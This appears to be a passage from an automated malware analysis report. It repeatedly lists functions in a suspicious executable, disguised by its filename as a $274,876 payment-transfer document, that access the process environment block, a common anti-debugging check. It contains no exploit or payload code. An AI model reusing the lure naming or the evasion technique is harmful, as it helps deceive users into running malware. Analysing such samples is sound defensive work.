Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01000050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01000050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010A2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01063884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01063884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010290AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010A131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01013B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01013B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010A138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0109D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01012397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010653CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010653CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0100DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FF8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01003A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01074257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010B8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0106A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01023D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01063540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01007D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01098DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]
